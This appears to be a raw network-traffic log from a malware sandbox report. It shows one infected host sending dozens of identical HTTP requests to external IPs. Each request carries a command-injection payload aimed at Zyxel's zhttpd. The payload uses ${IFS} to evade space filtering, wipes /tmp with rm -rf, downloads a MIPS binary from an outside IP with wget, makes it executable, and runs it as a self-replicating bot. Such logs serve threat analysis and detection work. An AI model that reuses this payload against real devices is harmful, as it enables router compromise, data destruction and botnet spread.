                              Mar 31, 2024 08:41:45.073164940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6225192.168.2.133523693.144.3.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073241949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6226192.168.2.1349064165.47.218.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073296070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6227192.168.2.1347564144.78.224.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073374987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6228192.168.2.1350060212.95.109.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073436022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6229192.168.2.1360008155.143.195.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073478937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6230192.168.2.135274064.96.22.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073561907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6231192.168.2.1353526190.254.16.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073622942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6232192.168.2.1344866190.54.101.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073693991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6233192.168.2.1338768173.92.210.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073765039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6234192.168.2.1344154126.164.214.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073847055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6235192.168.2.1353846144.85.108.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073899031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6236192.168.2.135654685.90.163.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.073956013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6237192.168.2.134677652.224.162.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074043036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6238192.168.2.1357654147.208.24.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074095964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6239192.168.2.1348838210.199.82.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074181080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6240192.168.2.13484664.110.71.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074251890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6241192.168.2.1352722122.161.238.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074311972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6242192.168.2.1339680120.187.105.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074376106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6243192.168.2.1350098155.234.14.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074431896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6244192.168.2.133723242.123.91.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074513912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6245192.168.2.1333720104.114.32.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074583054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6246192.168.2.1349048209.98.93.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074647903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6247192.168.2.1356928133.111.166.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074717045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6248192.168.2.1342826105.229.251.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074762106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6249192.168.2.135972868.1.86.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074835062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6250192.168.2.1333042165.149.246.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074877024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6251192.168.2.135936882.176.86.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.074954987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6252192.168.2.1346846145.98.204.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075023890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6253192.168.2.1344902106.189.255.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075110912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6254192.168.2.1340398204.58.175.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075165987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6255192.168.2.134938648.8.37.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075263977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6256192.168.2.1335156128.64.255.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075309992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6257192.168.2.134739678.46.65.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075366020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6258192.168.2.13330782.42.201.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075429916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6259192.168.2.1347312184.87.34.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075491905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6260192.168.2.134187065.68.21.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075579882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6261192.168.2.133966643.130.116.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075643063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6262192.168.2.1339892193.110.170.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075702906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6263192.168.2.133522857.67.252.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075752020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6264192.168.2.134679295.108.238.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075838089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6265192.168.2.135693677.83.61.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075891018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6266192.168.2.1335020157.229.138.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.075958967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6267192.168.2.13485664.23.225.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076031923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6268192.168.2.1344300148.229.84.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076108932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6269192.168.2.1350806171.146.173.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076179028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6270192.168.2.134601476.139.169.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076232910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6271192.168.2.1342328208.108.141.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076318979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6272192.168.2.134222697.90.54.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076369047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6273192.168.2.134201665.170.154.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076443911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6274192.168.2.134062490.49.76.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076486111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6275192.168.2.1360230123.236.156.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076576948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6276192.168.2.1336392221.249.2.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076634884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6277192.168.2.1335030121.192.19.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076709986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6278192.168.2.1340900155.229.162.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076771021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6279192.168.2.1342966134.56.68.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076844931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6280192.168.2.134465063.5.235.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076900959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6281192.168.2.1353190222.218.39.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.076967001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6282192.168.2.1351584197.89.66.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077040911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6283192.168.2.13609321.214.126.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077104092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6284192.168.2.134953625.209.143.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077178001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6285192.168.2.1348192114.89.29.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077234030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6286192.168.2.135786286.193.159.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077322006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6287192.168.2.133677846.135.202.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077392101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6288192.168.2.1349670205.64.50.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077467918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6289192.168.2.1334620111.155.99.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077528954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6290192.168.2.1349968189.187.235.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077595949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6291192.168.2.135786279.7.185.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077676058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6292192.168.2.13561409.92.15.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077754974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6293192.168.2.1343470177.153.117.234443
                              TimestampBytes transferredDirectionData
